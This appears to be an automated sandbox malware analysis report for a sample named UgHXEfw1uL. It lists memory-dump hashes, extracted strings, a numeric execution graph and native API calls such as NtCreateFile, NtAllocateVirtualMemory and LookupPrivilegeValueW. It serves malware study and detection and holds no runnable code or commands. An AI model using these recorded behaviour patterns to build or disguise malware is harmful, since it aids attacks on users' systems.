                                          • Opcode ID: 44d62ce3ce6b42d2a44001ec64d173ced77a5fefff224a361633a27bfc42c816
                                          • Instruction ID: 7255d47c33e38132ff2984244c0da6369380439380c57df6edc5f6b9cb352a71
                                          • Opcode Fuzzy Hash: 44d62ce3ce6b42d2a44001ec64d173ced77a5fefff224a361633a27bfc42c816
                                          • Instruction Fuzzy Hash: BEC01232504144BFCB026B90D845DED7F36AB95390F148044F6440D061D3738527DF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef3f20f53ae7fa670f3091e1a6de9f22a398b2983502b636bbd674f1b2671dd4
                                          • Instruction ID: 6c5462276bb48373d46f8743d86f841f4d4fe6dd46688fda13b70a3abad37f83
                                          • Opcode Fuzzy Hash: ef3f20f53ae7fa670f3091e1a6de9f22a398b2983502b636bbd674f1b2671dd4
                                          • Instruction Fuzzy Hash: 4EC022B0C1438E9A8314DB94C00408CBFA29B81250B20A21080A7990A4CA3891089205
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1f78155909c8ca158a2d405a4d114523030049613c94421ed35b408613e4df0e
                                          • Instruction ID: fd7240f4701cfdca877dfdda34fe49a9cd9645c0749d923eae36116e3cbcb163
                                          • Opcode Fuzzy Hash: 1f78155909c8ca158a2d405a4d114523030049613c94421ed35b408613e4df0e
                                          • Instruction Fuzzy Hash: E9C04C32144208BBCB027E81DC09E5ABF2ABB55794F148055F7440D161D773D663EBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 94<^$94<^
                                          • API String ID: 0-1501294510
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *P'
                                          • API String ID: 0-20195967
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: *P'
                                          • API String ID: 0-20195967
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 94<^
                                          • API String ID: 0-1881481335
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: fc\P
                                          • API String ID: 0-150814998
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: fc\P
                                          • API String ID: 0-150814998
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `va
                                          • API String ID: 0-542655976
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `va
                                          • API String ID: 0-542655976
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2071067523.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e40000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2074209371.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7670000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq
                                          • API String ID: 0-732967779
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4'cq$4'cq$4'cq$4'cq$4'cq
                                          • API String ID: 0-732967779
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:1.6%
                                          Dynamic/Decrypted Code Coverage:2.8%
                                          Signature Coverage:5.8%
                                          Total number of Nodes:568
                                          Total number of Limit Nodes:68
41af60 LdrLoadDll 91729->91730 91731 41a68c RtlFreeHeap 91730->91731 91731->91487 91733 407eb0 91732->91733 91734 407eab 91732->91734 91735 41bd40 2 API calls 91733->91735 91734->91392 91741 407ed5 91735->91741 91736 407f38 91736->91392 91737 419ec0 2 API calls 91737->91741 91738 407f3e 91740 407f64 91738->91740 91742 41a5c0 2 API calls 91738->91742 91740->91392 91741->91736 91741->91737 91741->91738 91744 41bd40 2 API calls 91741->91744 91748 41a5c0 91741->91748 91743 407f55 91742->91743 91743->91392 91744->91741 91746 40817e 91745->91746 91747 41a5c0 2 API calls 91745->91747 91746->91345 91747->91746 91749 41af60 LdrLoadDll 91748->91749 91750 41a5dc 91749->91750 91753 f62c70 LdrInitializeThunk 91750->91753 91751 41a5f3 91751->91741 91753->91751 91755 40b063 91754->91755 91757 40b0e0 91755->91757 91769 419c90 LdrLoadDll 91755->91769 91757->91359 91759 41af60 LdrLoadDll 91758->91759 91760 40f1bb 91759->91760 91760->91362 91761 41a7d0 91760->91761 91762 41af60 LdrLoadDll 91761->91762 91763 41a7ef LookupPrivilegeValueW 91762->91763 91763->91364 91765 41a27c 91764->91765 91766 41af60 LdrLoadDll 91764->91766 91770 f62ea0 LdrInitializeThunk 91765->91770 91766->91765 91767 41a29b 91767->91365 91769->91757 91770->91767 91772 40b1f0 91771->91772 91773 40b040 LdrLoadDll 91772->91773 91774 40b204 91773->91774 91774->91299 91776 40ae51 91775->91776 91777 40ae4d 91775->91777 91778 40ae6a 91776->91778 91779 40ae9c 91776->91779 91777->91302 91826 419cd0 LdrLoadDll 91778->91826 91827 419cd0 LdrLoadDll 91779->91827 91781 40aead 91781->91302 91783 40ae8c 91783->91302 91785 40f4a0 4 API calls 91784->91785 91786 4143c6 91785->91786 91786->91304 91828 4087a0 91787->91828 91790 408a9d 91790->91306 91791 4087a0 19 API calls 91792 408a8a 91791->91792 91792->91790 91846 40f710 11 API calls 91792->91846 91795 41af60 LdrLoadDll 91794->91795 91796 41a51c 91795->91796 91967 f62e80 LdrInitializeThunk 91796->91967 91797 40c322 91799 40f4a0 91797->91799 91800 40f4bd 91799->91800 91968 419fc0 
91800->91968 91802 40f505 91802->91310 91804 41a010 3 API calls 91805 40f52e 91804->91805 91805->91310 91807 41a02c 91806->91807 91808 41af60 LdrLoadDll 91806->91808 91974 f62d10 LdrInitializeThunk 91807->91974 91808->91807 91809 41a05b 91809->91315 91810 41af60 LdrLoadDll 91809->91810 91811 41a07c 91810->91811 91975 f62d30 LdrInitializeThunk 91811->91975 91812 41a08b 91812->91315 91816 41a066 91815->91816 91817 41af60 LdrLoadDll 91816->91817 91818 41a07c 91817->91818 91976 f62d30 LdrInitializeThunk 91818->91976 91819 40c459 91819->91327 91822 41af60 LdrLoadDll 91821->91822 91823 419e3c 91822->91823 91977 f62fb0 LdrInitializeThunk 91823->91977 91824 40c4ac 91824->91331 91826->91783 91827->91781 91829 407ea0 4 API calls 91828->91829 91838 4087ba 91828->91838 91829->91838 91830 408a49 91830->91790 91830->91791 91831 408a3f 91832 408160 2 API calls 91831->91832 91832->91830 91835 419f00 2 API calls 91835->91838 91837 41a490 LdrLoadDll NtClose 91837->91838 91838->91830 91838->91831 91838->91835 91838->91837 91841 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 91838->91841 91844 419e20 2 API calls 91838->91844 91847 419d10 91838->91847 91850 4085d0 91838->91850 91864 40f5f0 LdrLoadDll NtClose 91838->91864 91865 419d90 LdrLoadDll 91838->91865 91866 419dc0 LdrLoadDll 91838->91866 91867 419e50 LdrLoadDll 91838->91867 91868 4083a0 91838->91868 91884 405f60 LdrLoadDll 91838->91884 91841->91838 91844->91838 91846->91790 91848 41af60 LdrLoadDll 91847->91848 91849 419d2c 91848->91849 91849->91838 91851 4085e6 91850->91851 91885 419880 91851->91885 91853 408771 91853->91838 91854 4085ff 91854->91853 91855 409c10 LdrLoadDll 91854->91855 91856 4086a4 91855->91856 91906 4081a0 91856->91906 91858 4086e5 91858->91853 91859 4083a0 12 API calls 91858->91859 91860 408713 91859->91860 91860->91853 91861 419f00 2 API calls 91860->91861 91862 408748 91861->91862 91862->91853 91863 41a500 2 API calls 91862->91863 91863->91853 91864->91838 91865->91838 
91866->91838 91867->91838 91869 4083c9 91868->91869 91946 408310 91869->91946 91872 41a500 2 API calls 91873 4083dc 91872->91873 91873->91872 91874 408467 91873->91874 91876 408462 91873->91876 91954 40f670 91873->91954 91874->91838 91875 41a490 2 API calls 91877 40849a 91875->91877 91876->91875 91877->91874 91878 419d10 LdrLoadDll 91877->91878 91879 4084ff 91878->91879 91879->91874 91958 419d50 91879->91958 91881 408563 91881->91874 91882 414a50 9 API calls 91881->91882 91883 4085b8 91882->91883 91883->91838 91884->91838 91886 41bf90 2 API calls 91885->91886 91887 419897 91886->91887 91913 409310 91887->91913 91889 4198b2 91890 4198f0 91889->91890 91891 4198d9 91889->91891 91894 41bd40 2 API calls 91890->91894 91892 41bdc0 2 API calls 91891->91892 91893 4198e6 91892->91893 91893->91854 91895 41992a 91894->91895 91896 41bd40 2 API calls 91895->91896 91897 419943 91896->91897 91903 419be4 91897->91903 91919 41bd80 91897->91919 91900 419bd0 91901 41bdc0 2 API calls 91900->91901 91902 419bda 91901->91902 91902->91854 91904 41bdc0 2 API calls 91903->91904 91905 419c39 91904->91905 91905->91854 91907 40829f 91906->91907 91908 4081b5 91906->91908 91907->91858 91908->91907 91909 414a50 9 API calls 91908->91909 91910 408222 91909->91910 91911 41bdc0 2 API calls 91910->91911 91912 408249 91910->91912 91911->91912 91912->91858 91914 409335 91913->91914 91915 40acf0 LdrLoadDll 91914->91915 91916 409368 91915->91916 91917 40938d 91916->91917 91922 40cf20 91916->91922 91917->91889 91940 41a580 91919->91940 91923 40cf4c 91922->91923 91924 41a1e0 LdrLoadDll 91923->91924 91925 40cf65 91924->91925 91926 40cf6c 91925->91926 91933 41a220 91925->91933 91926->91917 91930 40cfa7 91931 41a490 2 API calls 91930->91931 91932 40cfca 91931->91932 91932->91917 91934 41a23c 91933->91934 91935 41af60 LdrLoadDll 91933->91935 91939 f62ca0 LdrInitializeThunk 91934->91939 91935->91934 91936 40cf8f 91936->91926 91938 41a810 LdrLoadDll 91936->91938 91938->91930 91939->91936 91941 41af60 LdrLoadDll 
91940->91941 91942 41a59c 91941->91942 91945 f62f90 LdrInitializeThunk 91942->91945 91943 419bc9 91943->91900 91943->91903 91945->91943 91947 408328 91946->91947 91948 40acf0 LdrLoadDll 91947->91948 91949 408343 91948->91949 91950 414e50 LdrLoadDll 91949->91950 91951 408353 91950->91951 91952 40835c PostThreadMessageW 91951->91952 91953 408370 91951->91953 91952->91953 91953->91873 91955 40f683 91954->91955 91961 419e90 91955->91961 91959 41af60 LdrLoadDll 91958->91959 91960 419d6c 91959->91960 91960->91881 91962 419eac 91961->91962 91963 41af60 LdrLoadDll 91961->91963 91966 f62dd0 LdrInitializeThunk 91962->91966 91963->91962 91964 40f6ae 91964->91873 91966->91964 91967->91797 91969 41af60 LdrLoadDll 91968->91969 91970 419fdc 91969->91970 91973 f62f30 LdrInitializeThunk 91970->91973 91971 40f4fe 91971->91802 91971->91804 91973->91971 91974->91809 91975->91812 91976->91819 91977->91824 91980 f62ad0 LdrInitializeThunk

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 41a3b3-41a3b8 1 41a438-41a459 NtReadFile 0->1 2 41a3ba-41a3bd 0->2 3 41a379-41a3b1 NtCreateFile 2->3 4 41a3bf 2->4 4->1
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CreateRead
                                          • String ID: 1JA$rMA$rMA
                                          • API String ID: 3388366904-782607585
                                          • Opcode ID: 9df585ef7528c99330dd9c225abfa0f77081c8156534e38467a865fb8406da49
                                          • Instruction ID: da19e3345d12220765821cfa474dde94d4a6965fe5b4db37016d0a13ebef53ee
                                          • Opcode Fuzzy Hash: 9df585ef7528c99330dd9c225abfa0f77081c8156534e38467a865fb8406da49
                                          • Instruction Fuzzy Hash: F6019EB2204049AFDB48CF98E890CEB77EDAF8C714B158649FA5CC7214D634E851CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5 41a410-41a426 6 41a42c-41a459 NtReadFile 5->6 7 41a427 call 41af60 5->7 7->6
                                          APIs
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 1JA$rMA$rMA
                                          • API String ID: 2738559852-782607585
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 9 41a40d-41a459 call 41af60 NtReadFile
                                          APIs
                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 1JA$rMA$rMA
                                          • API String ID: 2738559852-782607585
                                          • Opcode ID: 7d81298f37708454fe36051a0b19a8663e079e7aae2f52e55b683db97231eb52
                                          • Instruction ID: 5f5c384a850a33f48e31aee8c8964862e0f66c101092c9726f3ec3f83ad86f8a
                                          • Opcode Fuzzy Hash: 7d81298f37708454fe36051a0b19a8663e079e7aae2f52e55b683db97231eb52
                                          • Instruction Fuzzy Hash: 51F03AB6200049ABCB08DF98C880CEB77ADEF8C314B198649FD1CA3205C630E855CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 242 40acf0-40ad19 call 41cc50 245 40ad1b-40ad1e 242->245 246 40ad1f-40ad2d call 41d070 242->246 249 40ad3d-40ad4e call 41b4a0 246->249 250 40ad2f-40ad3a call 41d2f0 246->250 255 40ad50-40ad64 LdrLoadDll 249->255 256 40ad67-40ad6a 249->256 250->249 255->256
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                          • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 257 41a360-41a3b1 call 41af60 NtCreateFile
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 269 41a53b-41a556 270 41a55c-41a57d NtAllocateVirtualMemory 269->270 271 41a557 call 41af60 269->271 271->270
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: ac997fc6fc0c01afdfe400c9999fd9f8afcb9c96f5aaf7675eae2f0a0288d9fb
                                          • Instruction ID: 8a40d246b45b9bb42d74d366c08b5473b86aa9edf13011dae55a113455b40b06
                                          • Opcode Fuzzy Hash: ac997fc6fc0c01afdfe400c9999fd9f8afcb9c96f5aaf7675eae2f0a0288d9fb
                                          • Instruction Fuzzy Hash: EFF015B2210208AFDB18DF89DC81EEB77BDEF8C754F158159BE4897241C630E911CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 272 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_UgHXEfw1uL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
